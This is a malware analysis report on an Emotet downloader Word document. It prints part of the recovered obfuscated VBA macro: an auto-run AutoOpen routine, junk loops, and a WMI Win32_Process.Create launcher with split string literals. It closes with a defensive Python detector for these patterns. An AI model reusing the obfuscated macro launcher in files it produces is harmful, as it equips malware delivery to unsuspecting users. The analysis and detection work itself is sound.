Verdict: MALICIOUS (risk score 282)
Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1059 Command and Scripting Interpreter
- T1105 Ingress Tool Transfer
ClamAV fires a critical signature on this file, Doc.Downloader.Emotet-6964729-0. The recovered macro source supports that attribution: an AutoOpen procedure (declared as `Sub _` with `autoopen()` on a continuation line, so a naive search for `Sub autoopen` misses it) calls a function that obtains the WMI `Win32_Process` class via `GetObject("winmgmts:W" + "in32_Process")` and invokes `.Create` on it. Launching the second stage through WMI rather than `Shell` or `WScript.Shell` is a common Emotet maldoc technique for downloading and running further code while sidestepping the simpler macro detections. Two caveats for the analyst: the command line passed to `Create` is assembled at runtime from UserForm control properties (`PasswordChar`, `ControlSource`) and helper values that are not present in the extracted source, so the actual payload command and download URL are not recoverable from this static extraction; and the only URL found in the document is an Office schema namespace, not a network indicator.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6964729-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6964729-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions; in this sample the class name is split as `"winmgmts:W" + "in32_Process"`.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro present (here declared with a line continuation between `Sub _` and `autoopen()`).
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call present.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this rule is analyst-facing evidence of old Word macro execution surface, not a downloader or parser-CVE attribution; in this report it fires alongside a fully recovered VBA project, so treat it as corroborating evidence only.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI found in ordinary Office files; it is not a download or C2 location and should not be exported as an indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5027 bytes | beb1b49d22014b9470ba24741a7fb2c137d5f676f8126b2ac55cb5c324510995 |
Preview script (first 1,000 lines of the extracted script)

What the preview already shows: the auto-exec entry point is split across `Sub _` and `autoopen()` with a line continuation; every procedure is padded with `While ... Wend` loops whose conditions are undeclared variables (which evaluate to Empty, so the loops never run) and whose bodies are comment-only junk; the WMI class names are split into two literals (`"winmgmts:W" + "in32_Process"`, `"winmgmts:W" + "in32_ProcessStartup"`); and the command string `p64849` is concatenated from UserForm control properties (`PasswordChar`, `ControlSource`) and values on other modules rather than from string literals. The `s086157.Create k90062 + p64849 + B60157, O9313979, R3_6805_, w379137` call follows the `Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId)` signature, with `R3_6805_` returning the `Win32_ProcessStartup` object used as startup information. The command line itself is not recoverable from this source alone.

```vba
Attribute VB_Name = "W01317"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "L480_7"
Attribute VB_Base = "0{E3D6C57D-248A-49A1-B548-3804931D8D12}{056A0379-2A37-4F3A-A9FB-E8D848AF9327}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "n_2_17"
Attribute VB_Name = "u8745387"
Attribute VB_Name = "l9757223"
Attribute VB_Name = "G64_87"
Attribute VB_Base = "0{9ABC67A8-21AE-4515-B5B0-A144B093126D}{03B624B5-4361-42A6-BC7E-9AD2D20A2E50}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "s1_628"
Function w617274(S_803331)
While Z51802_ And z_4_852
'U89237K5324201A946465N6341245
Wend
While W55_10 And n6159879
'w_9113s8_009X05041_O9815210
Wend
While w886_63 And G468873
'i37191j4582917i_740080a94594
Wend
Set w617274 = CVar(S_803331)
While E_1_0_0 And i57108
'n598_9j5303533z358_278s39284
Wend
While L166_30 And a48_8573
't019931z_7560T5172858J66671
Wend
While o9842007 And b5854_
'j_38778w897108D0277058p656691
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While O94970 And Y6_57430
'p933000I65361_3D91885O6391795
Wend
While E86323 And T57940
'U0745884s485613V_1170j28__4_6
Wend
While W63541 And J8415989
'w841331t8278390K032708o59372_
Wend
Call k123262
While w29_640 And J4586364
'F4553377p7805683J66_60_8j1082278
Wend
While C146207 And D67253
'P1396877B4094728f_1785q2484908
Wend
While L757_25 And a25647
'q43981_3H_605516Y5791881b73_45
Wend
End Sub
Attribute VB_Name = "f648233"
Function k123262()
On Error Resume Next
While b577180 And m13946
't568269L290_62Y0835_81B42098
Wend
While R0853820 And U7_880
'f4315_8_r3807330U36126M9_034
Wend
p64849 = L480_7.q__9219.PasswordChar + G64_87.M33726_ + L480_7.q__9219.ControlSource + G64_87.z9_85247 + L480_7.q__9219.PasswordChar + L480_7.q__9219.PasswordChar + G64_87.k2324052 + L480_7.q__9219.PasswordChar + L480_7.q__9219.PasswordChar + G64_87.s08_0964 + L480_7.q__9219.PasswordChar + G64_87.w75836 + L480_7.q__9219.PasswordChar
While E5692_5 And v_817206
'h80_119h9_76320F_8368J781_40
Wend
While i3_4_214 And Y2648757
'f_90__63K82_15z59311s669_68
Wend
While w422_3 And h__6869
'm0_3_3_K3593483V_1788v1471403
Wend
Set s086157 = w617274(GetObject("winmgmts:W" + "in32_Process"))
While p989721 And m6094547
'V54539X609000J439_562c_56496
Wend
While q599374 And A813833
'l113952Z9606_89a3094_93v2277038
Wend
While z48118 And b75137
'J4_1422D06738M53_598r3212943
Wend
s086157.Create k90062 + p64849 + B60157, O9313979, R3_6805_, w379137
While V04_5087 And s58836
'u_2_794M2_43066t_29_83d39444
Wend
While v3762_ And n7752622
'r8_9543d8455190K25_5942E20029_4
Wend
End Function
Attribute VB_Name = "P61126"
Public Function R3_6805_()
While z_9098 And S9127150
'Q417816J5041757i4444538q081882
Wend
While H76094_ And v2150_
'E613454n4_886s31152V105825
Wend
While b29497 And n807224
'd8850488d526_9B795941u22115
Wend
Set R3_6805_ = w617274(GetObject("winmgmts:W" + "in32_ProcessStartup"))
While j7844812 And z80792
'p_2468G__8_19V528877D13406
Wend
While V4546952 And N8122_
'L08680t406665A476420_u113574
Wend
While A
```
... (truncated)
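The heuristics in this report (OLE_VBA_AUTOOPEN, OLE_VBA_GETOBJ, OLE_VBA_WMI_PROCESS_CREATE) only fire reliably on the preview above if the scanner first undoes the cheap tricks the macro uses: the `Sub _` line continuation, the comment-only junk loops, and the WMI moniker split into two literals. The script below is an added example written for this page, not the analyzer's own code, showing that normalization step and the matching logic over a constructed VBA snippet that mirrors the patterns in macros.bas (the snippet, the rule names used as dictionary keys, and the `junk_while_loops` counter are assumptions for illustration, not fields the report emits).

```python
import re

# Constructed sample (not the real macros.bas): it reproduces the obfuscation
# patterns visible in the extracted preview: a line-continued Sub name, a junk
# While/Wend loop with a comment-only body, and a WMI moniker split across two
# string literals followed by a .Create call.
SAMPLE_VBA = '''Attribute VB_Name = "s1_628"
Sub _
autoopen()
On Error Resume Next
While O94970 And Y6_57430
'p933000I65361_3D91885O6391795
Wend
Call k123262
End Sub
Attribute VB_Name = "f648233"
Function k123262()
On Error Resume Next
Set s086157 = w617274(GetObject("winmgmts:W" + "in32_Process"))
s086157.Create k90062 + p64849 + B60157, O9313979, R3_6805_, w379137
End Function
'''

# Procedure names Word/Excel run without user interaction beyond opening the file.
AUTOEXEC_NAMES = {
    "autoopen", "auto_open", "document_open", "workbook_open",
    "autoexec", "autoclose", "auto_close", "document_close", "autonew",
}


def normalize(src: str) -> str:
    """Undo the cheap evasions before pattern matching: join ' _' line
    continuations, drop comment-only lines, and fold adjacent string literals
    joined with + or & ("winmgmts:W" + "in32_Process" -> "winmgmts:Win32_Process")."""
    src = re.sub(r"[ \t]_\r?\n[ \t]*", " ", src)
    src = "\n".join(l for l in src.splitlines() if not l.lstrip().startswith("'"))
    concat = re.compile(r'"([^"\n]*)"\s*[+&]\s*"([^"\n]*)"')
    while True:  # repeat until no literal pair is left to fold
        folded = concat.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if folded == src:
            return src
        src = folded


def scan(src: str) -> dict:
    """Return the heuristics that fire on one VBA module, keyed by rule name."""
    findings = {}
    # Junk loops (While <undeclared vars> / comment-only body / Wend) are counted
    # on the raw text, before normalize() strips the comment lines.
    junk = re.findall(r"^[ \t]*While\b.*\n(?:[ \t]*'.*\n)+[ \t]*Wend\b", src, re.M | re.I)
    if junk:
        findings["junk_while_loops"] = len(junk)
    norm = normalize(src)
    procs = re.findall(
        r"^[ \t]*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_][A-Za-z0-9_]*)",
        norm, re.M | re.I)
    autoexec = [p for p in procs if p.lower() in AUTOEXEC_NAMES]
    if autoexec:
        findings["OLE_VBA_AUTOOPEN"] = autoexec
    if re.search(r"\bGetObject\s*\(", norm, re.I):
        findings["OLE_VBA_GETOBJ"] = True
    # The Win32_Process class name is only visible after folding; pairing the
    # moniker with a .Create call is what makes this a high-confidence launcher.
    moniker = re.search(r'"winmgmts:[^"]*win32_process"', norm, re.I)
    if moniker and re.search(r"\.\s*Create\b", norm, re.I):
        findings["OLE_VBA_WMI_PROCESS_CREATE"] = moniker.group(0)
    return findings


if __name__ == "__main__":
    for rule, hit in scan(SAMPLE_VBA).items():
        print(f"{rule}: {hit}")
```

Run it on the output of `olevba --decode` for a real document to get the same three rule hits the report shows; the folding step is also why a grep for `Win32_Process` over the raw source misses this sample while the analyzer does not.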